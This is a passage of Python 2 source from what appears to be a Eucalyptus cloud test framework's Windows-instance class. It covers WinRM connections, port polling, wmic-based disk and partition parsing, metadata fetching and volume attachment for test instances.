if len(line) + 2 > maxlen:
maxlen = len(line) + 2
for line in lines:
buf += str(line).ljust(maxlen) + "\n"
buf = buf.rstrip()
return (buf, maxlen)
bdmvol = self.root_device_type
if self.bdm_root_vol:
bdmvol += ":" + self.bdm_root_vol.id
reservation_id = None
if self.reservation:
reservation_id = self.reservation.id
owner_id = self.reservation.owner_id
else:
owner_id = "???"
# Create a multi line field for instance's run info
idlist = [markup("{0} {1}".format('ID:', self.id), markups=[1, 4, 94]),
"{0} {1}".format(markup('TYPE:'), self.instance_type),
"{0} {1}".format(markup('RES:'), reservation_id),
"{0}".format(markup("ACCOUNT ID:")), owner_id]
id_string, idlen = multi_line(idlist)
try:
emi = self.tester.get_emi(self.image_id)
emi_name = str(emi.name[0:18]) + ".."
except:
emi_name = ""
# Create a multi line field for the instance's image info
virt_type = 'PV'
if self.virtualization_type == 'hvm':
virt_type = 'HVM'
emi_string, emilen = multi_line(
[markup("{0} {1}".format('EMI:', self.image_id)),
"{0} {1}".format(markup('OS:'), self.platform or 'linux'),
"{0} {1}".format(markup('VIRT:'), virt_type),
"{0}".format(markup('IMAGE NAME:')),
emi_name])
# Create a multi line field for the instance's state info
age = int(self.age) if self.age else 0
state_string, state_len = multi_line(["STATE: " + state_markup(self.laststate),
"{0} {1}".format(markup('AGE:'), age),
"{0} {1}".format(markup("ZONE:"), self.placement),
markup('ROOTDEV:'), bdmvol])
# Create the primary table called pt...
netinfo = 'INSTANCE NETWORK INFO:'
idheader = 'INSTANCE ID'
imageheader = 'INSTANCE IMAGE'
stateheader = 'INSTANCE STATE'
pt = PrettyTable([idheader, imageheader, stateheader, netinfo])
pt.align[netinfo] = 'l'
pt.valign[netinfo] = 'm'
pt.align[idheader] = 'l'
pt.align[imageheader] = 'l'
pt.align[stateheader] = 'l'
pt.max_width[idheader] = idlen
pt.max_width[imageheader] = emilen
pt.max_width[stateheader] = state_len
pt.padding_width = 0
pt.hrules = ALL
# PrettyTable headers do not work with ascii markups, so make a pseudo header
new_header = []
for field in pt._field_names:
new_header.append(markup(field, markups=[1, 4]))
pt.add_row(new_header)
pt.header = False
# Create a subtable 'netpt' to summarize and format the networking portion...
# Set the maxwidth of each column so the tables line up when showing multiple instances
vpc_col = ('VPC', 4)
subnet_col = ('SUBNET', 6)
if self.vpc_id:
vpc_col = ('VPC', 12)
subnet_col = ('SUBNET', 15)
secgrp_col = ('SEC GRPS', 11)
privaddr_col = ('P', 1)
privip_col = ('PRIV IP', 15)
pubip_col = ('PUB IP', 15)
net_cols = [vpc_col, subnet_col, secgrp_col, privaddr_col, privip_col, pubip_col]
# Get the Max width of the main tables network summary column...
# Start with 2 to account for beginning and end column borders
netinfo_width = 2
netinfo_header = []
for col in net_cols:
netinfo_width += col[1] + 1
netinfo_header.append(col[0])
pt.max_width[netinfo] = netinfo_width
netpt = PrettyTable([vpc_col[0], subnet_col[0], secgrp_col[0], privaddr_col[0],
privip_col[0], pubip_col[0]])
netpt.padding_width = 0
netpt.vrules = ALL
for col in net_cols:
netpt.max_width[col[0]] = col[1]
sec_grps = []
for grp in self.groups:
sec_grps.append(str(grp.id))
sec_grps = ",".join(sec_grps)
private_addressing = "N"
if self.private_addressing:
private_addressing = "Y"
netpt.add_row([str(self.vpc_id).center(vpc_col[1]),
str(self.subnet_id).center(subnet_col[1]),
str(sec_grps).center(secgrp_col[1]),
str(private_addressing).center(privaddr_col[1]),
str(self.private_ip_address).center(privip_col[1]),
str(self.ip_address).center(pubip_col[1])])
# To squeeze a potentially long keyname under the network summary table, get the length
# and format this column to allow for wrapping a keyname under the table...
# netbuf = netpt.get_string()
netbuf = "{0}:{1} {2}:{3}\n".format(markup("NODE"),
self.tags.get('euca:node', "???").ljust(16),
markup("KEYPAIR"), self.key_name)
netbuf += "\n".join(netpt.get_string().splitlines()[0:-1])
# Create the row in the main table...
pt.add_row([id_string, emi_string, state_string, netbuf])
if printme:
printmethod = printmethod or self.log.debug
printmethod("\n" + str(pt) + "\n")
return pt
def get_password(self,
private_key_path=None,
key=None,
dir=None,
exten=".pem",
encoded=True,
force_update=False):
'''
:param private_key_path: private key file used to decrypt password
:param key: name of private key
:param dir: Path to private key
:param exten: extension of private key
:param encoded: boolean of whether string returned from server is
Base64 encoded
:return: decrypted password
'''
if self.password is None or force_update:
self.password = self.tester.get_windows_instance_password(
self,
private_key_path=private_key_path,
key=key,
dir=dir,
exten=exten,
encoded=encoded)
return self.password
def reset_ssh_connection(self, timeout=None):
# todo: Remove ssh reference from this method, use something like
# reset_instance_connection, etc..
self.debug('Note ssh not implemented at this time, using winrm for '
'shell access instead...')
return self.reset_winrm_connection(timeout=timeout)
def reset_winrm_connection(self, timeout=None, force=False):
# todo:
timeout = timeout or self.timeout
self.debug('reset_winrm_connection for:'+str(self.id))
self.get_password(force_update=True)
if self.username is None or self.password is None:
#Allow but warn here as this may be a valid negative test
self.debug('Warning username and/or password were None in '
'winrm connection?')
# Create a new winrm interface if this is a new instance or
# an attribute has changed...
try:
#Check the port in order to provide debug if the connection fails
self.test_port_status(port=self.winrm_port, ip=self.ip_address)
except:pass
if force or not (self.winrm and \
self.winrm.hostname == self.ip_address and \
self.winrm.username == self.username and \
self.winrm.password == self.password):
if self.winrm:
self.winrm.close_shell()
self.winrm = winrm_connection.Winrm_Connection(
hostname = self.ip_address,
username = self.username,
password = self.password,
port = self.winrm_port,
protocol = self.winrm_protocol,
debug_method = self.debug,
verbose=True
)
def get_reservation(self):
res = None
try:
res = self.tester.get_reservation_for_instance(self)
except Exception, e:
self.update()
self.debug('Could not get reservation for instance in state:' +
str(self.state) + ", err:" + str(e))
return res
def connect_to_instance(self, wait_for_boot=180, timeout=120):
'''
Attempts to connect to an instance via winrm.
:params wait_for_boot: time to wait, allowing guest to boot before
attempting to poll for ports active status
:params timeout: -optional - time in seconds to wait when polling
port(s) status(s) before failure
'''
self.debug("{0}connect_to_instance starting.\nwait_for_boot:{1} "
"seconds\ntimeout from boot:{2}{3}"
.format(termline, wait_for_boot, timeout, termline))
try:
self.poll_for_port_status_with_boot_delay(waitforboot=wait_for_boot,
timeout=timeout)
except Exception, e:
self.debug('Warning failed to poll port status:' + str(e))
self.debug("Attempting to create connection to instance:" + self.id)
attempts = 0
start = time.time()
elapsed = 0
if self.winrm is not None:
self.winrm.close_shell()
self.winrm = None
while (elapsed < timeout):
attempts += 1
try:
self.update()
self.reset_winrm_connection()
self.debug('Try some sys...')
self.sys("whoami")
except Exception, se:
tb = self.tester.get_traceback()
self.debug('Caught exception attempting to connect '
'winrm shell:\n'+ str(tb) + str(se))
elapsed = int(time.time()-start)
self.debug('connect_to_instance: Attempts:' + str(attempts) +
', elapsed:'+str(elapsed)+'/'+str(timeout))
if self.winrm is not None:
self.winrm.close_shell()
self.winrm = None
time.sleep(5)
pass
else:
break
elapsed = int(time.time()-start)
if self.winrm is None:
self.get_connection_debug()
raise RuntimeError(str(self.id) +
":Failed establishing management connection to "
"instance, elapsed:" + str(elapsed) +
"/" + str(timeout))
self.debug('Connect_to_instance updating attached volumes/disk '
'info for vols: ' + str(self.attached_vols))
if self.brief:
self.update_system_info()
else:
self.update_system_and_disk_info()
self.init_attached_volumes()
self.debug("{0}connect_to_instance completed{1}"
.format(termline, termline))
def get_connection_debug(self):
# Add network debug/diag info here...
# First show arp cache from local machine
# todo Consider getting info from relevant euca components:
# - iptables info
# - route info
# - instance xml
try:
# Show local ARP info...
arp_out = "\nLocal ARP cache for instance ip: " \
+ str(self.ip_address) + "\n"
arp_fd = os.popen('arp ' + str(self.ip_address))
for line in arp_fd:
arp_out += line
self.debug(arp_out)
except Exception as AE:
self.log.debug('Failed to get arp info:' + str(AE))
try:
self.tester.get_console_output(self)
except Exception as CE:
self.log.debug('Failed to get console output:' + str(CE))
def update_root_device_diskdrive(self):
if not self.root_device_type == 'ebs':
return
for disk in self.diskdrives:
if disk.index == 0:
if disk.ebs_volume:
for vol in self.attached_vols:
if vol.id == disk.ebs_volume:
if not disk.md5:
disk.update_md5_info_from_ebs()
return
volume = self.tester.get_volume(volume_id=disk.ebs_volume)
if not isinstance(volume, EuVolume):
volume = EuVolume.make_euvol_from_vol(volume, self.tester)
volume.guestdev = disk.deviceid
volume.md5len = 1024
volume.md5 = self.get_dev_md5(disk.cygwin_scsi_drive, volume.md5len)
if not self.get_volume_from_attached_list_by_id(volume.id):
self.debug("{0} updating with root vol:{1}{2}"
.format(termline,
volume.id,
termline))
self.attached_vols.append(volume)
disk.update_md5_info_from_ebs()
return
def get_volume_from_attached_list_by_id(self, volume_id):
for vol in self.attached_vols:
if vol.id == volume_id:
return vol
def update_system_and_disk_info(self):
try:
self.update_system_info()
except Exception, sie:
tb = self.tester.get_traceback()
self.debug(str(tb) + "\nError updating system info:" + str(sie))
try:
self.update_disk_info()
self.update_root_device_diskdrive()
self.print_partition_summary()
self.print_logicaldisk_summary()
self.print_diskdrive_summary()
except Exception, ude:
tb = self.tester.get_traceback()
self.debug(str(tb) + "\nError updating disk info:" + str(ude))
def has_sudo(self):
return False
def debug(self,msg,traceback=1,method=None,frame=False):
'''
Used to print debug output, defaults to print() but is overridden by self.debugmethod if not None
msg - mandatory -string, message to be printed
'''
if ( self.verbose is True ):
self.debugmethod(msg)
def sys(self, cmd, verbose=True, code=None, include_stderr=False, enable_debug=False, timeout=None):
'''
Issues a command against the ssh connection to this instance
Returns a list of the lines from stdout+stderr as a result of the command
cmd - mandatory - string, the command to be executed
verbose - optional - boolean flag to enable debug
timeout - optional - command timeout in seconds
'''
if (self.winrm is None):
raise Exception("WinInstance winrm connection is None")
return self.winrm.sys(command=cmd, include_stderr=include_stderr, timeout=timeout, verbose=verbose, code=code)
def test_rdp_port_status(self, ip=None, port=3389, timeout=10):
'''
Description: Attempts to test that the host is accepting tcp connections to the RDP port
'''
ip = ip or self.ip_address
return self.test_port_status(ip=ip, port=port, timeout=timeout)
def test_port_status(self, port, ip=None, timeout=5, tcp=True, verbose=True):
ip = ip or self.ip_address
return self.tester.test_port_status(ip, int(port), timeout=timeout, tcp=tcp, verbose=verbose)
def poll_for_port_status_with_boot_delay(self, interval=15, ports=[], socktimeout=5,timeout=180, waitforboot=300):
'''
Make sure some time has passed since launch before polling the guest side ports...
'''
launch_seconds = self.tester.get_instance_time_launched(self)
sleeptime = 0 if launch_seconds > waitforboot else (waitforboot - launch_seconds)
self.debug("Instance was launched "+str(launch_seconds)+" seconds ago, waiting:"+str(sleeptime)+" for instance to boot")
time.sleep(sleeptime)
return self.poll_for_ports_status(ports,
ip=self.ip_address,
interval=interval,
socktimeout=socktimeout,
timeout=timeout)
def wait_for_time_since_launch(self,waitforboot=420):
'''
When using larger instance store images, this can allow for the delays caused by image size/transfer.
'''
boot_seconds = self.tester.get_instance_time_launched(self)
sleeptime = 0 if boot_seconds > waitforboot else (waitforboot - boot_seconds)
self.debug("Instance was launched "+str(boot_seconds)+"/"+str(waitforboot) + " seconds ago, waiting:"+str(sleeptime)+" for instance to boot")
start = time.time()
elapsed = 0
print "Waiting for Windows to fully boot:",
while elapsed < sleeptime:
print "Waiting for Windows to fully boot:"+str(sleeptime-elapsed),
time.sleep(5)
elapsed=int(time.time()-start)
self.debug("test_wait_for_instance_boot: done waiting, instance up for "+str(waitforboot)+" seconds")
def poll_for_ports_status(self, ports=[], ip=None, interval=10, socktimeout=5, timeout=180):
ip = ip or self.ip_address
ports = ports or [self.rdp_port, self.winrm_port]
start = time.time()
elapsed = 0
attempt = 0
while elapsed < timeout:
attempt +=1
self.debug('test_poll_for_ports_status, ports: ' + ",".join(str(x) for x in ports) + ", attempt:" + str(attempt))
for port in ports:
if elapsed < timeout:
try:
self.debug('Trying ip:port:' + str(self.ip_address) + ':' + str(port) + ", elapsed:" + str(elapsed))
self.test_port_status(ip=ip, port=int(port), timeout=5)
return
except socket.error, se:
self.debug('test_ports_status failed socket error:'+str(se[0]))
#handle specific errors here, for now just for debug...
ecode=se[0]
if ecode == socket.errno.ETIMEDOUT or ecode == "timed out":
self.debug("test_poll_for_ports_status: Connect "+str(ip)+":" +str(port)+ " timed out retrying. Time remaining("+str(timeout-elapsed)+")")
except Exception, e:
tb = self.tester.get_traceback()
self.debug(tb)
self.debug('test_poll_for_ports_status:'+str(ip)+':'+str(port)+' FAILED after attempts:'+str(attempt)+', elapsed:'+str(elapsed)+', err:'+str(e) )
elapsed = int(time.time() -start)
if elapsed < timeout:
time.sleep(interval)
raise Exception('test_poll_for_ports_status:'+str(ip)+':'+str(port)+' FAILED after attempts:'+str(attempt)+', elapsed:'+str(elapsed)+' seconds')
def init_attached_volumes(self):
self.debug('init_attached_volumes... attached_vols: ' + str(self.attached_vols))
syncdict = self.sync_attached_volumes_with_clouds_view()
if syncdict['errors']:
errmsg = 'Errors syncing guest volumes with cloud at init:' + ",".join(str(e) for e in syncdict['errors'])
errmsg += 'Failed to sync guest volumes with cloud at init:' + ",".join(str(x) for x in syncdict['badvols'])
self.debug(errmsg)
time.sleep(60)
raise Exception(errmsg)
def sync_attached_volumes_with_clouds_view(self):
self.debug(termline +
"Starting sync_attached_volumes_with_clouds_view"
+ termline )
badvols = []
errors = []
ret = {'errors':errors, 'badvols':badvols}
#Get a list of volumes that the cloud believes are currently attached
cloud_volumes = self.tester.get_volumes(attached_instance=self.id)
#Make a copy of a list of volumes this instance thinks are currently attached
locallist = copy.copy(self.attached_vols)
self.debug('Cloud list:' + str(cloud_volumes))
self.debug('Local list:' + str(locallist))
for vol in cloud_volumes:
for local_vol in locallist:
if local_vol.id == vol.id:
locallist.remove(local_vol)
if not isinstance(vol, EuVolume):
vol = EuVolume.make_euvol_from_vol(vol, self.tester)
try:
self.update_volume_guest_info(volume=vol)
except Exception, e:
badvols.append(vol)
errors.append(vol.id + ' Error syncing with cloud:' + str (e) + '. \n')
for local_vol in locallist:
badvols.append(local_vol)
errors.append(local_vol.id + ' Error: volume found in guest attached list but not attached per the cloud. \n')
self.debug(termline +
"Finishing sync_attached_volumes_with_clouds_view"
+ termline )
return ret
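# The returned dict has the shape {'errors': [<error strings>], 'badvols': [<EuVolume objs>]};
# an empty 'errors' list indicates the guest and cloud views of attached volumes agree.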
def update_system_info(self):
'''
Gather basic system info for this windows instance object and store in self.system_info
Example:
# print wins.system_info.os_name
'Microsoft Windows 7 Professional'
'''
currentkey = None
swap = re.compile('([!@#$%^&*. ])')
info = self.sys('systeminfo')
if self.system_info:
system_info = self.system_info
else:
system_info = type('obj', (object,),{})
if info:
for line in info:
if re.match("^\w.+:", line):
linevals = line.split(':')
currentkey = linevals.pop(0)
#clean up the key string...
currentkey = re.sub('[()]', '', currentkey)
currentkey = re.sub(swap, '_', currentkey)
currentkey = currentkey.lower()
value = ":".join(str(x) for x in linevals) or ""
setattr(system_info, currentkey, str(value).strip())
elif currentkey:
#this is an additional value to our previous key
prev_value = getattr(system_info, currentkey)
if not isinstance(prev_value, types.ListType):
updated_value = [prev_value]
updated_value.append(str(line).strip())
setattr(system_info, currentkey, updated_value)
self.system_info = system_info
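# Keys are derived from the 'systeminfo' labels by stripping parentheses and replacing
# spaces/special characters with underscores, then lowercasing: e.g. a line starting with
# 'OS Name:' becomes the attribute system_info.os_name.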
def get_cygwin_path(self, prefix="c:\\"):
if self.cygwin_path:
return self.cygwin_path
path = None
self.debug('Trying to find cygwin path...')
out = self.sys('dir ' + str(prefix) + ' /B')
for line in out:
if re.search('cygwin', line):
path = str(prefix) + str(line.strip()) + "\\"
self.cygwin_path = path
break
return path
def cygwin_curl(self, url, connect_timeout=30):
cygpath = self.get_cygwin_path()
if cygpath is None:
raise Exception('Could not find cygwin path on guest for curl?')
curl = cygpath + 'bin\\curl.exe --connect-timeout ' + str(connect_timeout) + ' '
return self.sys(curl + str(url), code=0, timeout=connect_timeout)
def get_metadata(self, element_path='', prefix='latest/meta-data/', use_cygwin=True):
"""Return the lines of metadata from the element path provided"""
### If the metadata service ip can be reached use it to get metadata, otherwise try the CLC directly
try:
if use_cygwin:
return self.cygwin_curl("http://169.254.169.254/"+str(prefix)+str(element_path), connect_timeout=10)
else:
return self.sys("curl --connect-timeout 10 http://169.254.169.254/"+str(prefix)+str(element_path), code=0)
except:
if use_cygwin:
return self.cygwin_curl("http://" + self.tester.get_ec2_ip() + ":8773/"+str(prefix) + str(element_path))
else:
return self.sys("curl http://" + self.tester.get_ec2_ip() + ":8773/"+str(prefix) + str(element_path), code=0)
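# e.g. self.get_metadata('instance-id') would return the lines fetched from
# http://169.254.169.254/latest/meta-data/instance-id (or the CLC fallback above).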
def print_diskdrive_summary(self,printmethod=None):
printmethod = printmethod or self.debug
if not self.diskdrives:
printmethod('No disk drives to print?')
return
disklist = copy.copy(self.diskdrives)
buf = (disklist.pop()).get_summary()
for disk in disklist:
buf += disk.get_summary(printheader=False)
printmethod(buf)
def print_partition_summary(self,printmethod=None):
printmethod = printmethod or self.debug
if not self.disk_partitions:
printmethod('No disk partitions to print?')
return
partlist = copy.copy(self.disk_partitions)
buf = (partlist.pop()).get_summary()
for part in partlist:
buf += part.get_summary(printheader=False)
printmethod(buf)
def print_logicaldisk_summary(self,printmethod=None):
printmethod = printmethod or self.debug
if not self.logicaldisks:
printmethod('No logical disks to print?')
return
disklist = copy.copy(self.logicaldisks)
buf = (disklist.pop()).get_summary()
for disk in disklist:
buf += disk.get_summary(printheader=False)
printmethod(buf)
def update_disk_info(self , forceupdate=False):
if self.diskdrives:
if not forceupdate and (time.time() - self.diskdrives[0].last_updated) <= self.disk_update_interval:
return
self.debug('Fetching updated disk info...')
self.diskdrives = []
self.disk_partitions = []
self.logicaldisks = []
self.diskdrives = self.get_updated_diskdrive_info()
self.disk_partitions = self.get_updated_partition_info()
self.logicaldisks = self.get_updated_logicaldisk_info()
self.associate_diskdrives_to_partitions()
self.associate_partitions_to_logicaldrives()
def get_updated_diskdrive_info(self):
'''
Populate self.diskdrives with WinInstanceDisk objects containing info parsed from wmic command.
Since wmic doesn't seem to use delimiters this method attempts to derive the length of each column/header
in order to parse out the info per disk.
:param force: boolean. Will force an update, otherwise this method will wait a minimum of
self.disk_update_interval before updating again.
'''
#cmd = "wmic diskdrive get /format:textvaluelist.xsl"
self.debug('Getting updated diskdrive info...')
cmd = "wmic diskdrive list full"
diskdrives = []
for disk_dict in self.get_parsed_wmic_command_output(cmd):
try:
diskdrives.append(WinInstanceDiskDrive(self,disk_dict))
except Exception, e:
tb = self.tester.get_traceback()
self.debug('Error attempting to create WinInstanceDiskDrive from following dict:')
self.print_dict(dict=disk_dict)
raise Exception(str(tb) + "\n Error attempting to create WinInstanceDiskDrive:" + str(e))
self.debug('get_updated_diskdrive_info, Done')
return diskdrives
def get_updated_partition_info(self):
'''
Populate self.disk_partitions with WinInstanceDiskPartition objects containing info parsed from wmic command.
Since wmic doesn't seem to use delimiters this method attempts to derive the length of each column/header
in order to parse out the info per disk.
:param force: boolean. Will force an update, otherwise this method will wait a minimum of
self.disk_update_interval before updating again.
'''
self.debug('Getting updated partition info...')
cmd = "wmic partition list brief /format:textvaluelist.xsl"
disk_partitions = []
for part_dict in self.get_parsed_wmic_command_output(cmd):
try:
disk_partitions.append(WinInstanceDiskPartition(self,part_dict))
except Exception, e:
tb = self.tester.get_traceback()
self.debug('Error attempting to create WinInstanceDiskPartition from following dict:')
self.print_dict(dict=part_dict)
raise Exception(str(tb) + "\n Error attempting to create WinInstanceDiskPartition:" + str(e))
self.debug('get_updated_partition_info, Done')
return disk_partitions
def get_updated_logicaldisk_info(self):
self.debug('Getting updated logicaldisk info...')
cmd ='wmic logicaldisk list /format:textvaluelist.xsl'
logicaldisks = []
for part_dict in self.get_parsed_wmic_command_output(cmd):
try:
logicaldisks.append(WinInstanceLogicalDisk(self,part_dict))
except Exception, e:
tb = self.tester.get_traceback()
self.debug('Error attempting to create WinInstanceLogicalDisk from following dict:')
self.print_dict(dict=part_dict)
raise Exception(str(tb) + "\n Error attempting to create WinInstanceLogicalDisk:" + str(e))
self.debug('get_updated_logicaldisk_info, Done')
return logicaldisks
def associate_diskdrives_to_partitions(self):
for disk in self.diskdrives:
disk.disk_partitions = []
for part in self.disk_partitions:
if part.diskindex == disk.index:
disk.disk_partitions.append(part)
def associate_partitions_to_logicaldrives(self, verbose=False):
for part in self.disk_partitions:
drive_id = None
part.logicaldisks = []
cmd = 'wmic partition where (DeviceID="Disk #' + str(part.diskindex) + \
', Partition #' + str(part.index) + '") assoc /assocclass:Win32_LogicalDiskToPartition'
output = self.sys(cmd, verbose=verbose, code=0)
for line in output:
if re.search('Win32_LogicalDisk.DeviceID',line):
try:
drive_id = str(line.split()[0].split('=')[1]).replace('"','').strip()
except Exception, e:
tb = self.tester.get_traceback()
self.debug(str(tb)+ "\nError getting logical drive info:" + str(e))
if drive_id:
for disk in self.logicaldisks:
if re.match(disk.deviceid, drive_id):
part.logicaldisks.append(disk)
disk.partition = part
break
def get_cygwin_scsi_dev_for_windows_drive(self, windisk=None, drive_id=""):
'''
param windisk: WinInstanceDiskType object. windisk.deviceid is used to look up the associated cygwin device
param drive_id: String representing the deviceid. Can be used instead of passing a WinInstanceDiskType
'''
windisk_classname = ""
update = False
retries = 2
if windisk:
drive_id = windisk.deviceid
windisk_classname = str(windisk.__class__).split('.').pop()
#If this is a disk drive, allow a retry which sets the force update flag; otherwise don't force an update on retry
if isinstance(windisk,WinInstanceDiskDrive):
update = True
if not drive_id:
raise Exception('WinInstanceDiskType or string w/ device id not provided')
self.debug('Attempting to get cygwin dev for windows drive:' + str(drive_id))
self.update_cygwin_windows_device_map()
for retry in xrange(0, retries):
for device in self.cygwin_dev_map:
if re.search("dev", device):
win_dev = str(self.cygwin_dev_map[device].split('\\').pop()).strip().upper()
formated_drive_id = str(drive_id.split('\\').pop()).strip().upper()
#self.debug('Attempt to match:"' + str(win_dev) + '" with "' + str(formated_drive_id) + '"')
if formated_drive_id == win_dev:
#self.debug('Found match')
return device
if update:
self.update_cygwin_windows_device_map(force_update=True)
else:
break
self.debug('WARNING: Could not find cygwin device for type:"' + str(windisk_classname) + '", deviceid:' + str(drive_id))
return ""
def get_parsed_wmic_command_output(self, wmic_command, verbose=False):
'''
Attempts to parse a wmic command using "/format:textvaluelist.xsl" for key value format into a list of
dicts.
:param wmic_command: string representing the remote wmic command to be run
:returns : list of dict(s) created from the parsed key value output of the command.
Note keys will be in lowercase
'''
self.debug('get_parsed_wmic_command_output, command:' + str(wmic_command))
ret_dicts = []
output = self.sys(wmic_command, verbose=verbose, code=0)
newdict = {}
for line in output:
if not re.match(r"^\w",line):
#If there is a blank line(s) then the previous object is complete
if newdict:
ret_dicts.append(newdict)
newdict = {}
else:
splitline = line.split('=')
key = str(splitline.pop(0)).lower()
if len(splitline) > 1:
value = "=".join(str(x) for x in splitline)
else:
if splitline:
value = splitline.pop()
else:
value = ''
newdict[key] = value
return ret_dicts
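# Sketch of the expected parsing: wmic textvaluelist output such as
#   DeviceID=C:
#   Size=21261099008
#   (blank line)
# yields [{'deviceid': 'C:', 'size': '21261099008'}, ...]; blank lines delimit objects,
# keys are lowercased, and all values are returned as strings.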
def get_logicaldisk_ids(self, forceupdate=False):
'''
:param forceupdate: boolean, to force an update of logical disks detected on the guest. Otherwise updates are
throttled to self.disk_update_interval
:returns list of device ids (ie: [A:,C:,D:])
'''
ret = []
self.update_disk_info(forceupdate=forceupdate)
for disk in self.logicaldisks:
ret.append(disk.deviceid)
return ret
def get_diskdrive_ids(self, drivelist=None, forceupdate=False):
'''
:param forceupdate: boolean, to force an update of logical disks detected on the guest. Otherwise updates are
throttled to self.disk_update_interval
:returns list of device ids ie: ['\\.\PHYSICALDRIVE0','\\.\PHYSICALDRIVE1','\\.\PHYSICALDRIVE2']
'''
ret = []
if not drivelist:
self.update_disk_info(forceupdate=forceupdate)
drivelist = self.diskdrives
for disk in drivelist:
ret.append(disk.deviceid)
return ret
def get_diskdrive_by_deviceid(self, deviceid):
for disk in self.diskdrives:
if disk.deviceid == deviceid:
return disk
def found(self, command, regex):
""" Returns a Boolean of whether the result of the command contains the regex"""
result = self.sys(command)
for line in result:
found = re.search(regex,line)
if found:
return True
return False
def assertFilePresent(self,filepath):
'''
Raise exception if file not found at filepath on remote guest. dirs '\' need to be represented as '\\'
'''
self.sys('dir ' + str(filepath), code=0)
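# e.g. self.assertFilePresent('C:\\Windows\\system32\\drivers\\etc\\hosts') -- note the
# doubled backslashes per the docstring above (the path shown is only an illustration).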
def assertCygwinFilePresent(self, filepath):
self.cygwin_cmd('ls ' + str(filepath), code=0)
def attach_volume(self, volume, dev=None, timeout=180, overwrite=False):
'''
Method used to attach a volume to an instance and track its use by that instance
required - euvolume - the euvolume object being attached
required - tester - the eucaops/nephoria object/connection for this cloud
optional - dev - string to specify the dev path to 'request' when attaching the volume to
optional - timeout - integer- time allowed before failing
optional - overwrite - flag to indicate whether to overwrite head data of a non-zero filled volume upon attach for md5
'''
if not isinstance(volume, EuVolume):
volume = EuVolume.make_euvol_from_vol(volume)
return self.attach_euvolume(volume, dev=dev, timeout=timeout, overwrite=overwrite)
def attach_euvolume(self, euvolume, dev=None, timeout=180, overwrite=False):
'''
Method used to attach a volume to an instance and track its use by that instance
required - euvolume - the euvolume object being attached
required - tester - the eucaops/nephoria object/connection for this cloud
optional - dev - string to specify the dev path to 'request' when attaching the volume to
optional - timeout - integer- time allowed before failing
optional - overwrite - flag to indicate whether to overwrite head data of a non-zero filled volume upon attach for md5
'''
if not isinstance(euvolume, EuVolume):
raise Exception("Volume needs to be of type euvolume, try attach_volume() instead?")
self.debug('Disk drive summary before attach attempt:')
self.print_logicaldisk_summary()
self.print_diskdrive_summary()
self.debug("Attempting to attach volume:"+str(euvolume.id)+" to instance:" +str(self.id)+" to dev:"+ str(dev))
#grab a snapshot of our devices before attach for comparison purposes
diskdrive_list_before = self.get_diskdrive_ids()
use_serial = False
for disk in self.diskdrives:
if re.search('vol-', disk.serialnumber):
use_serial = True
break
attached_dev = None
start= time.time()
elapsed = 0
if dev is None:
#update our block device prefix
dev = self.get_free_scsi_dev()
if (self.tester.attach_volume(self, euvolume, dev, pause=10,timeout=timeout)):
if euvolume.attach_data.device != dev:
raise Exception('Attached device:' + str(euvolume.attach_data.device) +
", does not equal requested dev:" + str(dev))
#Find device this volume is using on guest...
euvolume.guestdev = None
while (not euvolume.guestdev and elapsed < timeout):
#Since all hypervisors may not support serial number info, check for an incremental diff in the
# list of physical diskdrives on this guest.
self.debug("Checking for volume attachment on guest, elapsed time("+str(elapsed)+")")
diskdrive_list_after = self.get_diskdrive_ids(forceupdate=True)
self.print_logicaldisk_summary()
self.print_diskdrive_summary()
self.debug("dev_list_after:"+" ".join(diskdrive_list_after))
diff =list( set(diskdrive_list_after) - set(diskdrive_list_before) )
if len(diff) > 0:
self.debug('Got Diff in drives:' + str(diff))
for disk in self.diskdrives:
if re.search('vol-', disk.serialnumber):
use_serial = True
if euvolume.id == disk.ebs_volume:
attached_dev = disk.deviceid
euvolume.guestdev = attached_dev
self.debug("Volume:"+str(euvolume.id)+" guest device by serialnumber:"+str(euvolume.guestdev))
break
if not use_serial:
attached_dev = str(diff[0])
euvolume.guestdev = attached_dev.strip()
self.debug("Volume:"+str(euvolume.id)+"found guest device by diff:"+str(euvolume.guestdev))
if attached_dev:
euvolume.guestdev = attached_dev
attached_vol = self.get_volume_from_attached_list_by_id(euvolume.id)
self.attached_vols.append(euvolume)
self.debug(euvolume.id+": Requested dev:"+str(euvolume.attach_data.device)+", attached to guest device:"+str(euvolume.guestdev))
break
elapsed = int(time.time() - start)
time.sleep(2)
if not euvolume.guestdev or not attached_dev:
raise Exception('Device not found on guest after '+str(elapsed)+' seconds')
else:
self.debug('Failed to attach volume:'+str(euvolume.id)+' to instance:'+self.id)
raise Exception('Failed to attach volume:'+str(euvolume.id)+' to instance:'+self.id)
if (attached_dev is None):
self.debug("List after\n"+" ".join(diskdrive_list_after))
raise Exception('Volume:'+str(euvolume.id)+' attached, but not found on guest'+str(self.id)+' after '+str(elapsed)+' seconds?')
#Store the md5sum of this diskdrive in the euvolume...
disk = self.get_diskdrive_by_deviceid(attached_dev)
euvolume.md5len = 1024
euvolume.md5 = self.get_dev_md5(devpath=disk.cygwin_scsi_drive, length=euvolume.md5len)
#update the volume and instances information about the attachment...
self.update_volume_guest_info(volume=euvolume,md5=euvolume.md5, md5len=euvolume.md5len, guestdev=euvolume.guestdev)
self.debug('Success attaching volume:'+str(euvolume.id)+' to instance:'+self.id +
', cloud dev:'+str(euvolume.attach_data.device)+', attached dev:'+str(attached_dev) +
", elapsed:" + str(elapsed))
try:
self.rescan_disks(timeout=20)
except Exception, e:
self.debug('Warning. Error while trying to rescan disks after attaching volume. Error: ' + str(e))
euvolume.printself(printmethod=self.debug)
disk.print_self()
return attached_dev
def get_guest_dev_for_volume(self, volume, forceupdate=False):
use_serial = False
self.update_disk_info(forceupdate=forceupdate)
for disk in self.diskdrives:
if re.search('vol-', disk.serialnumber):
use_serial = True
break
if not isinstance(volume, EuVolume):
volume = EuVolume.make_euvol_from_vol(volume=volume, tester=self.tester)
def get_disk_drive_by_id(self, deviceid):
self.update_system_info()
for disk in self.diskdrives:
if disk.deviceid == deviceid:
return disk
return None
def get_guestdevs_inuse_by_vols(self):
retlist = []
for vol in self.attached_vols:
retlist.append(vol.guestdev)
return retlist
def get_free_scsi_dev(self, prefix=None,maxdevs=16):
'''
The volume attach command requires a cloud level device name that is not currently associated with a volume
Note: This is the device name from the cloud's perspective, not necessarily the guest's
This method attempts to find a free device name to use in the command
optional - prefix - string, pre-pended to the device search string
optional - maxdevs - number used to specify the max device names to iterate over. Some virt envs have a limit of 16 devs.
'''
d='e'
in_use_cloud = ""
in_use_guest = ""
dev = None
if prefix is None:
prefix = self.block_device_prefix
